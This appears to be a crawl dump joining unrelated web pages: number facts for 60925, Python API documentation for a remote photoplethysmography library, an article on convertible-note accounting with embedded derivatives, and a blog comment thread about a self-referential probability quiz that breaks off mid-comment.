{"ft_lang_label":"__label__en","ft_lang_prob":0.58680487,"math_prob":0.93401843,"size":2300,"snap":"2020-24-2020-29","text_gpt3_token_len":906,"char_repetition_ratio":0.13545296,"word_repetition_ratio":0.028673835,"special_character_ratio":0.4926087,"punctuation_ratio":0.20558882,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9732871,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-05-27T03:29:57Z\",\"WARC-Record-ID\":\"<urn:uuid:91e56531-a1b1-4bce-abdc-6fe9a0e7319d>\",\"Content-Length\":\"30254\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0605be82-907b-44eb-894d-9cb45667e993>\",\"WARC-Concurrent-To\":\"<urn:uuid:50604421-4e20-4e64-a4a0-92d24a2f10dc>\",\"WARC-IP-Address\":\"69.164.220.180\",\"WARC-Target-URI\":\"https://www.biostars.org/p/191500/\",\"WARC-Payload-Digest\":\"sha1:HUIIS3T6KAZ2TAPW7OKP2PGSX7WZB5SP\",\"WARC-Block-Digest\":\"sha1:KPXFGWMY55WZOQXDZFNN3YPCE3KJ4GVW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-24/CC-MAIN-2020-24_segments_1590347392057.6_warc_CC-MAIN-20200527013445-20200527043445-00083.warc.gz\"}"}
https://metanumbers.com/60925
[ "# 60925 (number)\n\n60,925 (sixty thousand nine hundred twenty-five) is an odd five-digits composite number following 60924 and preceding 60926. In scientific notation, it is written as 6.0925 × 104. The sum of its digits is 22. It has a total of 3 prime factors and 6 positive divisors. There are 48,720 positive integers (up to 60925) that are relatively prime to 60925.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Odd\n• Number length 5\n• Sum of Digits 22\n• Digital Root 4\n\n## Name\n\nShort name 60 thousand 925 sixty thousand nine hundred twenty-five\n\n## Notation\n\nScientific notation 6.0925 × 104 60.925 × 103\n\n## Prime Factorization of 60925\n\nPrime Factorization 52 × 2437\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 2 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 12185 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) 0 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 60,925 is 52 × 2437. Since it has a total of 3 prime factors, 60,925 is a composite number.\n\n## Divisors of 60925\n\n1, 5, 25, 2437, 12185, 60925\n\n6 divisors\n\n Even divisors 0 6 6 0\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 6 Total number of the positive divisors of n σ(n) 75578 Sum of all the positive divisors of n s(n) 14653 Sum of the proper positive divisors of n A(n) 12596.3 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 246.83 Returns the nth root of the product of n divisors H(n) 4.83672 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 60,925 can be divided by 6 positive divisors (out of which 0 are even, and 6 are odd). The sum of these divisors (counting 60,925) is 75,578, the average is 125,96.,333.\n\n## Other Arithmetic Functions (n = 60925)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 48720 Total number of positive integers not greater than n that are coprime to n λ(n) 12180 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 6127 Total number of primes less than or equal to n r2(n) 24 The number of ways n can be represented as the sum of 2 squares\n\nThere are 48,720 positive integers (less than 60,925) that are coprime with 60,925. And there are approximately 6,127 prime numbers less than or equal to 60,925.\n\n## Divisibility of 60925\n\n m n mod m 2 3 4 5 6 7 8 9 1 1 1 0 1 4 5 4\n\nThe number 60,925 is divisible by 5.\n\n• Deficient\n\n• Polite\n\n## Base conversion (60925)\n\nBase System Value\n2 Binary 1110110111111101\n3 Ternary 10002120111\n4 Quaternary 32313331\n5 Quinary 3422200\n6 Senary 1150021\n8 Octal 166775\n10 Decimal 60925\n12 Duodecimal 2b311\n20 Vigesimal 7c65\n36 Base36 1b0d\n\n## Basic calculations (n = 60925)\n\n### Multiplication\n\nn×y\n n×2 121850 182775 243700 304625\n\n### Division\n\nn÷y\n n÷2 30462.5 20308.3 15231.2 12185\n\n### Exponentiation\n\nny\n n2 3711855625 226144803953125 13777872180844140625 839416862617929267578125\n\n### Nth Root\n\ny√n\n 2√n 246.83 39.3488 15.7108 9.05647\n\n## 60925 as geometric shapes\n\n### Circle\n\n Diameter 121850 382803 1.16611e+10\n\n### Sphere\n\n Volume 9.47273e+14 4.66446e+10 382803\n\n### Square\n\nLength = n\n Perimeter 243700 3.71186e+09 86161\n\n### Cube\n\nLength = n\n Surface area 2.22711e+10 2.26145e+14 105525\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 182775 1.60728e+09 52762.6\n\n### Triangular Pyramid\n\nLength = n\n Surface area 6.42912e+09 2.66514e+13 49745.1\n\n## Cryptographic Hash Functions\n\nmd5 ab7516dda6d82b5d330c69b6a9d1a490 3223126ae9f6eec2919b649045a68d0eca671120 306184c7005240b32c89b0abae4e6c8ed0e7b8641ce5ae6d69076c071110622d 63949f348d32156b12419bf1a08253a245b9c7ae99096be17325368030844f0ca07290bf06bc6f171210098267180ed890fd3e4db72fc98ba50b3cc394dfcc3e c17e9a3df9bfac1bae68576af3acb40f264ed6d5" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6175006,"math_prob":0.98531735,"size":4487,"snap":"2021-43-2021-49","text_gpt3_token_len":1586,"char_repetition_ratio":0.11978586,"word_repetition_ratio":0.025757575,"special_character_ratio":0.4582126,"punctuation_ratio":0.07922078,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9953346,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-07T01:07:57Z\",\"WARC-Record-ID\":\"<urn:uuid:ea526820-66b1-4c65-a480-34df624ad496>\",\"Content-Length\":\"38939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:bb134b61-ee45-454e-bc6f-42eb96984ed0>\",\"WARC-Concurrent-To\":\"<urn:uuid:2d6424f9-7706-4ec9-aaf3-fa8b2245ea65>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/60925\",\"WARC-Payload-Digest\":\"sha1:ZPGFXRD2XJ7TTLUMBEXM5IE24PMKOU74\",\"WARC-Block-Digest\":\"sha1:GGNRKZZN53MZLBFNOCXRSZRFVTEDJQDX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363327.64_warc_CC-MAIN-20211206224536-20211207014536-00219.warc.gz\"}"}
https://www.idiap.ch/software/bob/docs/bob/bob.rppg.base/stable/py_api_cvpr14.html
[ "Li’s CVPR14 Python API¶\n\nSignals extraction¶\n\nbuilds a mask on the lower part of the face\n\nThe mask is built using selected keypoints retrieved by a Discriminative Response Map Fitting (DRMF) algorithm. Note that the DRMF is not implemented here, and that the keypoints are loaded from file (and are not provided in the package).\n\nNote also that this function is explicitly made for the keypoints set generated by the Matlab software downloaded from http://ibug.doc.ic.ac.uk/resources/drmf-matlab-code-cvpr-2013/\n\nUpdate: this function also works when using bob.ip.dlib.DlibLandmarkExtraction\n\nParameters\n• image (numpy.ndarray) – The current frame.\n\n• keypoints (numpy.ndarray) – the set of 66 keypoints retrieved by DRMF.\n\n• indent (int) – The percentage of the facewidth [in pixels] by which selected keypoints are shifted inside the face to build the mask. THe facewidth is defined by the distance between the two keypoints located on the right and left edge of the face, at the eyes’ height.\n\n• plot (bool) – If set to True, plots the current face with the selected keypoints and the built mask.\n\nReturns\n\n• mask (numpy.ndarray) – A boolean array of the size of the original image, where the region corresponding to the mask is True.\n\n• mask_points (list of tuple) – The points corresponding to vertices of the mask.\n\nreturns a boolean array where the mask is True.\n\nIt turns mask points into a region of interest and returns the corresponding boolean array, of the same size as the image.\n\nParameters\n• image (numpy.ndarray) – The current frame.\n\n• mask_points (list of tuple) – The points corresponding to vertices of the mask.\n\nReturns\n\nmask – A boolean array of the size of the original image, where the region corresponding to the mask is True.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.extract_utils.get_good_features_to_track(face, npoints, quality=0.01, min_distance=10, plot=False)[source]\n\napplies the openCV function “good features to track”\n\nParameters\n• face (numpy.ndarray) – The cropped face image\n\n• npoints (int) – The maximum number of strong corners you want to detect\n\n• quality (float) – The minimum relative quality of the detected corners. Note that increasing this value decreases the number of detected corners. Defaluts to 0.01.\n\n• min_distance (int) – minimum euclidean distance between detected corners.\n\n• plot (bool) – if we should plot the currently selected features to track.\n\nReturns\n\ncorners – the detected strong corners.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.extract_utils.track_features(previous, current, previous_points, plot=False)[source]\n\nprojects the features from the previous frame in the current frame.\n\nParameters\n• previous (numpy.ndarray) – the previous frame.\n\n• current (numpy.ndarray) – the current frame.\n\n• previous_points (numpy.ndarray) – the set of keypoints to track (in the previous frame).\n\n• plot (bool) – Plots the keypoints projected on the current frame.\n\nReturns\n\ncurrent_points – the set of keypoints in the current frame.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.extract_utils.find_transformation(previous_points, current_points)[source]\n\nfinds the transformation matrix from previous points to current points.\n\nThe transformation matrix is found using estimateRigidTransform (fancier alternatives have been tried, but are not that stable).\n\nParameters\n• previous_points (numpy.ndarray) – Set of ‘starting’ 2d points\n\n• current_points (numpy.ndarray) – Set of ‘destination’ 2d points\n\nReturns\n\ntransformation_matrix – the affine transformation matrix between the two sets of points.\n\nReturn type\n\nnumpy.ndarray\n\nParameters\n• previous_mask_points (numpy.ndarray) – The points forming the mask in the previous frame\n\n• transformation_matrix (numpy.ndarray) – the affine transformation matrix between the two sets of points.\n\nReturns\n\nReturn type\n\nnumpy.ndarray\n\ncomputes the average green color within a given mask.\n\nParameters\n• image (numpy.ndarray) – The image containing the face.\n\n• mask (numpy.ndarray) – A boolean array of the size of the original image, where the region corresponding to the mask is True.\n\n• plot (bool) – Plot the mask as an overlay on the original image.\n\nReturns\n\ncolor – The average RGB colors inside the mask ROI.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.extract_utils.compute_average_colors_wholeface(image, plot=False)[source]\n\ncomputes the average green color within the provided face image\n\nParameters\n• image (numpy.ndarray) – The cropped face image\n\n• plot (bool) – Plot the mask as an overlay on the original image.\n\nReturns\n\ncolor – The average green color inside the face\n\nReturn type\n\nfloat\n\nIllumination rectification¶\n\nbob.rppg.cvpr14.illum_utils.rectify_illumination(face_color, bg_color, step, length)[source]\n\nperforms illumination rectification.\n\nThe correction is made on the face green values using the background green values, so as to remove global illumination variations in the face green color signal.\n\nParameters\n• face_color (numpy.ndarray) – The mean green value of the face across the video sequence.\n\n• bg_color (numpy.ndarray) – The mean green value of the background across the video sequence.\n\n• step (float) – Step size in the filter’s weight adaptation.\n\n• length (int) – Length of the filter.\n\nReturns\n\nrectified color – The mean green values of the face, corrected for illumination variations.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.illum_utils.nlms(signal, desired_signal, n_filter_taps, step, initCoeffs=None, adapt=True)[source]\n\nNormalized least mean square filter.\n\nParameters\n• signal (numpy.ndarray) – The signal to be filtered.\n\n• desired_signal (numpy.ndarray) – The target signal.\n\n• n_filter_taps (int) – The number of filter taps (related to the filter order).\n\n• step (float) – Adaptation step for the filter weights.\n\n• initCoeffs (numpy.ndarray) – Initial values for the weights. Defaults to zero.\n\n• adapt (bool) – If True, adapt the filter weights. If False, only filters.\n\nReturns\n\n• y (numpy.ndarray) – The filtered signal.\n\n• e (numpy.ndarray) – The error signal (difference between filtered and desired)\n\n• w (numpy.ndarray) – The found weights of the filter.\n\nMotion correction¶\n\nbob.rppg.cvpr14.motion_utils.build_segments(signal, length)[source]\n\nbuilds an array containing segments of the signal.\n\nThe signal is divided into segments of provided length (no overlap) and the different segments are stacked.\n\nParameters\n• signal (numpy.ndarray) – The signal to be processed.\n\n• length (int) – The length of the segments.\n\nReturns\n\n• segments (numpy.ndarray) – the segments composing the signal.\n\n• end_index (int) – The length of the signal (there may be a trail smaller than a segment at the end of the signal, that will be discarded).\n\nbob.rppg.cvpr14.motion_utils.prune_segments(segments, threshold)[source]\n\nremove segments.\n\nSegments are removed if their standard deviation is higher than the provided threshold.\n\nParameters\n• segments (numpy.ndarray) – The set of segments.\n\n• threshold (float) – Threshold on the standard deviation.\n\nReturns\n\n• pruned_segments (numpy.ndarray) – The set of “stable” segments.\n\n• gaps (list of length (# of retained segments)) – Boolean list that tells if a gap should be accounted for when building the final signal.\n\n• cut_index (list of tuples) – Contains the start and end index of each removed segment. Used for plotting purposes.\n\nbob.rppg.cvpr14.motion_utils.build_final_signal(segments, gaps)[source]\n\nbuilds the final signal with remaining segments.\n\nParameters\n• segments (numpy.ndarray) – The set of remaining segments.\n\n• gaps (list) – Boolean list that tells if a gap should be accounted for when building the final signal.\n\nReturns\n\nfinal_signal – The final signal.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.motion_utils.build_final_signal_cvpr14(segments, gaps)[source]\n\nbuilds the final signal with remaining segments.\n\nWarning\n\nThis contains a bug !\n\nBuilds the final signal, but reproducing the bug found in the code provided by the authors of [li-cvpr-2014]. The bug is in the ‘collage’ of remaining segments. The gap is not always properly accounted for…\n\nParameters\n• segments (numpy.ndarray) – The set of remaining segments.\n\n• gaps (list) – Boolean list that tells if a gap should be accounted for when building the final signal.\n\nReturns\n\nfinal_signal – The final signal.\n\nReturn type\n\nnumpy.ndarray\n\nFiltering¶\n\nbob.rppg.cvpr14.filter_utils.detrend(signal, Lambda)[source]\n\napplies a detrending filter.\n\nThis code is based on the following article “An advanced detrending method with application to HRV analysis”. Tarvainen et al., IEEE Trans on Biomedical Engineering, 2002.\n\nParameters\n• signal (numpy.ndarray) – The signal where you want to remove the trend.\n\n• Lambda (int) – The smoothing parameter.\n\nReturns\n\nfiltered_signal – The detrended signal.\n\nReturn type\n\nnumpy.ndarray\n\nbob.rppg.cvpr14.filter_utils.average(signal, window_size)[source]\n\nMoving average filter.\n\nParameters\n• signal (numpy.ndarray) – The signal to filter.\n\n• window_size (int) – The size of the window to compute the average.\n\nReturns\n\nfiltered_signal – The averaged signal.\n\nReturn type\n\nnumpy.ndarray" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.718593,"math_prob":0.91655874,"size":9293,"snap":"2022-05-2022-21","text_gpt3_token_len":2182,"char_repetition_ratio":0.1735386,"word_repetition_ratio":0.18423048,"special_character_ratio":0.22490047,"punctuation_ratio":0.15729627,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9885233,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-27T00:11:19Z\",\"WARC-Record-ID\":\"<urn:uuid:7a82282c-d4f2-4936-9897-4cba60f8b2a6>\",\"Content-Length\":\"42472\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ee4cd390-b181-41a7-b43f-797ca5bd3352>\",\"WARC-Concurrent-To\":\"<urn:uuid:791e9605-e250-460e-b584-e7893cf84966>\",\"WARC-IP-Address\":\"192.33.221.201\",\"WARC-Target-URI\":\"https://www.idiap.ch/software/bob/docs/bob/bob.rppg.base/stable/py_api_cvpr14.html\",\"WARC-Payload-Digest\":\"sha1:E4BNCRLYKICS3S2GUQ3ZBHGTCORFOD24\",\"WARC-Block-Digest\":\"sha1:JQLI3T4VS2HQXRZIWQYDWKJTBUUKWZE5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305006.68_warc_CC-MAIN-20220126222652-20220127012652-00030.warc.gz\"}"}
https://annualreporting.info/convertible-note-with-embedded-derivative-the-numbers/
[ "# Convertible note with embedded derivative The numbers\n\nConvertible note with embedded derivative The numbers provides the numbers to the case and the journal entries and calculations. In practice, many conversion features in convertible notes fail equity classification, which means that the conversion feature is a financial liability. Convertible note with embedded derivative The numbers\n\nThe reason that many conversion features fail equity classification is that they contain contractual terms that result in the holder of the conversion feature having rights that are different to those of existing shareholders. This is because the contractual terms mean that either: Convertible note with embedded derivative The numbers\n\n• The number of shares to be issued varies Convertible note with embedded derivative The numbers\n• The amount of cash (or carrying amount of the liability) converted into shares varies Convertible note with embedded derivative The numbers\n• Both the number of shares and the amount of cash (the carrying amount of the liability) vary.\n\nThe commercial effect of this is that the holder of the conversion feature obtains a different return in comparison with an investor that holds equity shares. See also Convertible note with embedded derivative – Basics. Convertible note with embedded derivative The numbers\n\nExample Convertible note with embedded derivative – The numbers\n\nEntity B issues a note with a face value of CU 1,000 which has a maturity of three years from its date of issue. The note pays a 10% annual coupon and, on maturity at the end of three years, the holder has an option either to receive a cash repayment of CU 1,000 or to convert the note into the Entity B’s shares. The note would be converted into Entity B’s shares using the average of the lowest five days value weighted average price (VWAP) in the previous 30 days prior to maturity. The conversion feature is determined to have a fair value of CU 20 at issue date.\n\nEntity B incurred transaction costs of CU 100 in issuing the convertible note. Convertible note with embedded derivative The numbers\n\nAnalysis Convertible note with embedded derivative – The numbers", null, "Using the flowchart above for the entire instrument, it is assessed as being a financial liability with an embedded derivative liability. The analysis is as follows:\n\n1. Step 1 is to consider whether there is a contractual obligation to pay cash that the issuer cannot avoid. The answer is yes, as the issuer has to pay an annual cash coupon and could be required to repay the capital amount at the end of three years if the holder chooses not to exercise the conversion option\n2. Step 2 is to consider whether IAS 32.16A-D apply. These paragraphs set out a specific and specialist exception from the requirement to classify certain financial instruments, which the issuer has an obligation (or potential obligation) to repurchase, as financial liabilities. This exception does not typically apply to convertible instruments and is not applicable in this example\n3. Step 3 is to consider whether the instrument has any characteristics that are similar to equity. The answer is yes as the instrument contains an option to be converted into equity instruments. The question of whether the conversion feature meets the criteria to be classified as equity is dealt with separately.\n\nFor the purposes of the compound instrument, the host debt component will be classified as a financial liability in its entirety. This is because there is an obligation to pay cash that the issuer cannot avoid (see above) and, for this component on a stand-alone basis there is no feature that is similar to equity.\n\nThe conversion feature is then assessed, again on a stand-alone basis. Starting with the box at the top left hand side of the diagram:\n\n• There is no contractual obligation to pay cash that the issuer cannot avoid. The equity conversion feature can only be settled through the issue of equity shares, otherwise it will simply expire unexercised Convertible note with embedded derivative The numbers\n• However, there is an obligation to issue a variable number of shares – the number of shares to be issued is based on the lowest 5 day VWAP in the last 30 days prior to maturity.\n\nConsequently, the conversion feature is also classified as liability. Convertible note with embedded derivative The numbers\n\nThis means that the note contains the following components:\n\n• Contractual cash flows of 10% annual coupons and a cash repayment of CU 1,000 (liability) Convertible note with embedded derivative The numbers\n• The conversion feature to convert the liability to in to equity of the issuer at the lowest five day share price in the previous 30 days prior to maturity (an embedded derivative liability).\n\nFor convertible notes with embedded derivative liabilities, the embedded derivative liability is determined first and the residual value is assigned to the debt host liability. Therefore, the debt host liability is initially recognised at CU 980 being the residual value from deducting the fair value of the derivative liability from the transaction price (i.e. CU 1,000 less CU 20).\n\nTransaction costs Convertible note with embedded derivative The numbers\n\nTransaction costs are to be apportioned to the debt liability and the embedded derivative. The portion attributed the conversion feature is immediately expensed, because the embedded derivative liability is accounted for at fair value through profit or loss. For the portion of transaction costs that are attributed to the loan, these are added to the carrying amount of the financial liability and amortised as part of the effective interest rate. Convertible note with embedded derivative The numbers\n\nEntity B adjusts the carrying amount of the liability component for transaction costs incurred as follows:\n\nAllocation of transaction costs Convertible note with embedded derivative The numbers\n\n A Fair value before transaction costs % B Transaction costs allocation A – B = Carrying amount Liability CU 980 98%1 CU 98 2 CU 882 Derivative liability CU 20 2%3 CU 2 4 > to profit or loss CU 205 100%\n\nThe effective interest rate is recalculated after adjusting for the transaction costs, and for the host liability component it is 15.18 % (this is determined by establishing the rate that is required to discount the contractual cash flows back to the carrying amount, as adjusted for transaction costs). Entity B will therefore record interest expense at the effective interest rate (15.18%). The difference between interest expense (15.18%) and the cash coupon (10%) increases the carrying amount of the liability so that, on maturity, the carrying amount is equal to the cash payment that might be required to be made.\n\nThe following table shows the balance of liability component over the life of the loan.\n\n Year Opening Interest6 Cash coupon7 Closing 1 CU 882 CU 134 CU (100) CU 916 2 CU 916 CU 139 CU (100) CU 955 3 CU 955 CU 145 CU (100) CU 1,000\n\nDerivative liability\n\nThe fair value of the conversion feature would have to be determined at each reporting date and the fair value changes would be recognised in profit or loss. The following table sets out the effect on profit or loss assuming the following fair values at each year end:\n\n Year Fair value of conversion feature Profit or (loss) effect CU (20) 8 1 CU (100) CU (80) 2 CU 0 CU 100 3 CU (300) CU (300)\n\nThus, if the conversion feature is classified as a derivative liability, this will often lead to a significantly higher and more volatile expense pattern in trading profit or loss. This is because a derivative liability is remeasured to fair value at each reporting date, whereas if the conversion feature is classified as equity, because if equity classification is met, no re-measurement of the conversion feature is required.", null, "Topics\n\n### Convertible note with embedded derivative The numbers\n\n`Annualreporting.info provides financial reporting narratives using IFRS keywords and terminology for free to students and others interested in financial reporting. The information provided on this website is for general information and educational purposes only and should not be used as a substitute for professional advice. Use at your own risk. Annualreporting.info is an independent website and it is not affiliated with, endorsed by, or in any other way associated with the IFRS Foundation. For official information concerning IFRS Standards, visit IFRS.org.`\n\n``` Related posts: Convertible note with embedded derivative Basics Convertible notes Basic requirements ```" ]
[ null, "https://annualreporting.info/wp-content/uploads/2019/08/Liability-and-equity-classification-in-IAS-32.png", null, "https://annualreporting.info/wp-content/uploads/2019/03/IFRS-Banner2.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.919523,"math_prob":0.89983255,"size":9023,"snap":"2021-04-2021-17","text_gpt3_token_len":1819,"char_repetition_ratio":0.16675906,"word_repetition_ratio":0.18871726,"special_character_ratio":0.20647235,"punctuation_ratio":0.06606799,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9624676,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-18T06:52:19Z\",\"WARC-Record-ID\":\"<urn:uuid:f5b06f27-2c5a-40da-9dee-8d809445419e>\",\"Content-Length\":\"83883\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:04a2da9c-e882-4722-93d0-57b1edacf85b>\",\"WARC-Concurrent-To\":\"<urn:uuid:4b4b2052-9401-49e2-82b2-3173956d0a45>\",\"WARC-IP-Address\":\"81.169.145.82\",\"WARC-Target-URI\":\"https://annualreporting.info/convertible-note-with-embedded-derivative-the-numbers/\",\"WARC-Payload-Digest\":\"sha1:QQ3YJMY5REI4227B6JAFPU6Y7BNMN4N5\",\"WARC-Block-Digest\":\"sha1:46BKVPCOGTGLAD4Q3ITVV4YYMPGFKB4G\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703514423.60_warc_CC-MAIN-20210118061434-20210118091434-00202.warc.gz\"}"}
http://beust.com/weblog/2011/10/27/probability-quiz/
[ "## Probability quiz\n\n• #1 by Danil on October 27, 2011 - 2:05 pm", null, "HHH = A\nHHT = B\nHTH = B\nHTT = C\nTHH = B\nTHT = B\nTTH = B\nTTT = D\n25%\n“It’s all in the wrist.”\n\n• #2 by Danil on October 27, 2011 - 2:06 pm", null, "‘cept that I threw in some Bs that should be Cs 🙁\n\n• #3 by Cedric on October 27, 2011 - 2:06 pm", null, "Wrong 🙂\n\n• #4 by Cedric on October 27, 2011 - 2:06 pm", null, "Still wrong 🙂\n\n• #5 by tjsnell on October 27, 2011 - 2:16 pm", null, "You should switch doors.\n\n• #6 by HimJim on October 27, 2011 - 2:24 pm", null, "0\n\n• #7 by Cerdeira on October 27, 2011 - 2:40 pm", null, "Because the probability is 25% but because you have 2 25% in 4 possible 😀 2/4 = half so 50% 😀\nMy brain is hurting me 😉\nCheers,\nJo�o Cerdeira\n\n• #8 by Daniel Spiewak on October 27, 2011 - 3:06 pm", null, "Here’s the trick: the answer 25% appears twice, thus it cannot be correct since, if it were, the correct answer would be 50% instead of 25%. Unfortunately, 50% is also incorrect, since it only appears once, and this the probability of selecting *that* answer at random is 25%, not 50%. By a similar argument, we can eliminate 60%. Thus, there is no correct answer to this question.\nIn other news: this is awesome.\n\n• #9 by Cedric on October 27, 2011 - 3:11 pm", null, "• #10 by Uncle Bob on October 27, 2011 - 3:14 pm", null, "A question that appeared on a chemistry exam:\nWrite a question suitable for a chemistry exam and then answer it.\n\n• #11 by Pedro Furlanetto on October 27, 2011 - 3:21 pm", null, "I got the same conclusion you did but at the G+\n\n• #12 by Pedro Furlanetto on October 27, 2011 - 3:59 pm", null, "I meant “Daniel, I got the same conclusion you did but at the G+”\n\n• #13 by Michael Chermside on October 27, 2011 - 4:10 pm", null, "Like Daniel said, except that the answer is 0 percent. The question never stated that the answer must be A, B, C, or D. And I am assuming that “chose an answer at random” means to choose from amongst A, B C, and D with uniform likelihood.\n\n• #14 by Runar on October 27, 2011 - 4:21 pm", null, "The question has a type error, and the answer is bottom. It’s an infinite regression that alternates between 25% and 50% but never converges.\nI’m sorry, but paradoxes are not profound. Bottoms lead to nontermination, not enlightenment.\n\n• #15 by Cedric on October 27, 2011 - 4:26 pm", null, "Runar: wow, you must be fun at parties 🙂\nAnyway, your answer is wrong. There is a correct answer and it’s one of the four listed. No tricks.\nHaving said this, you are touching on something interesting with your “type error” observation, which I’ll cover in my answer.\n\n• #16 by Daniel Spiewak on October 27, 2011 - 4:28 pm", null, "So, there’s something a little interesting about the fact that we’re choosing an answer uniformly at random. Thus, we have a 50% chance of selecting 25%, and a 25% chance of selecting 50%. This, I believe, is the key to the answer…\n0.25 * 0.5 = 0.125\n0.5 * 0.25 = 0.125\n0.125 + 0.125 = 0.25\nThus, the correct answer is 25%, which is to say, both A and D.\n\n• #17 by rdm on October 27, 2011 - 5:23 pm", null, "If “choose an answer to this question at random” means pick one option from {A,B,C,D{ then 50% of the answers will be 25%, 25% of the answers will be 50%, and 25% of the answers will be 60%. If it means pick a distinct value from the set 25%, 50%, 60% then the answers would be 1/3 of each. Since a 1/3 probability has nothing to do with the available answers let’s ignore that.\nThat leaves the question of “correctness”. And a question here is whether there is a single correct value or whether there is a series of correct values. But let’s assume that there is a single correct value. But, that single correct value depends on what “correctness” means. One possibility is that correctness corresponds to the numerical values listed. But this concept leads to contradictions. Another possibility is that there is one correct answer and that that answer is either A, B, C or D and that we do not know what that answer is.\nIf this latter definition of correctness is being used (and it’s sadly representative of educational testing), then the answer is obvious.\n\n• #18 by Rik on October 27, 2011 - 8:35 pm", null, "It depends on the answer. If answer is 25%, it is 50%. Otherwise 25%.\n\n• #19 by Micharl on October 27, 2011 - 10:08 pm", null, "• #20 by Patrick Gras on October 27, 2011 - 11:27 pm", null, "There is 0% chance I will be correct,\nbecause if I may choose:\n25% with 50% of chances\n50% with 25% of chances\n60% with 25% of chances\nbut I have no chance to choose:\nX% with X% chances…\n\n• #21 by Dominique Gallot on October 27, 2011 - 11:31 pm", null, "If you carefully read the question, you will understand that there are no correct answers\n�If YOU�, so the number of answer is 1, your result can be only wrong or correct. Therefore the only valid responses are 0% or 100%, which anyway are not in the list.\n\n• #22 by Maarten on October 27, 2011 - 11:56 pm", null, "e. 20%\n\n• #23 by Rapha�l Jolly on October 28, 2011 - 12:14 am", null, "The question doesn’t imply that the answer is in the list. So, 0%\n\n• #24 by fischi on October 28, 2011 - 12:35 am", null, "Dominique, i think you are on the right track.\nNoone said you had to choose an answer from the given (4) choices – so there a two theories:\n* it is an open question, so the possibility of random answers is infinite, therefore the propability of getting it right is nearly 0%. as 0% is not listed, i assume the question to be yes or no.\n* in this case, randomly chosen, you get the 50% propability.\nThe answer (if you follow this type of thinking) would be B, 50%.\nCedric will tell us, if i got it right. If it is purely mathematical AND you have to choose from the FOUR answers given, i will have to reconsider 😉\n\n• #25 by Denis on October 28, 2011 - 1:01 am", null, "50% because probability of 25% is 2/4 = 0.5 = 50%. There is no such thing as “depends” because only 25% is the correct answer.\n\n• #26 by Dennis Lenaerts on October 28, 2011 - 1:45 am", null, "By “choosing an answer at random”, you do mean de set of possible answers is {A,B,C,D}, and the probabilities are uniformly distributed across all four answers, right?\nIf not, you could just choose within {A,B} with 1/2 probability for each answer, and B would be correct.\n\n• #27 by Kevin Wright on October 28, 2011 - 2:20 am", null, "I say it’s a bit of a trick question. It doesn’t state that your answer absolutely must be one of those listed.\nThere’s a 25% chance that you’ll pick 50%\nA 25% chance that you’ll pick 60%\nand a 50% chance that you’ll pick 25%\nTherefore, the chance that you’ll be correct by randomly choosing one of the listed answers is 0%\n\n• #28 by Michael on October 28, 2011 - 2:47 am", null, "If you choose your answer by logic and reason, then your pick is not random any more.\nThe criterion to decide, if an answer is correct, is to assert, that you have picked truly randomly. So, when you try to pick randomly and i make assertions on each pick (guessing), how often would i assert right?\nI would flip a coin.\n\n• #29 by Manu on October 28, 2011 - 3:22 am", null, "the probability that it’s not 25% are 50%, for 50% it’s 25% and for 60% it’s also 25% hence:\n0.25 *0 .5 = 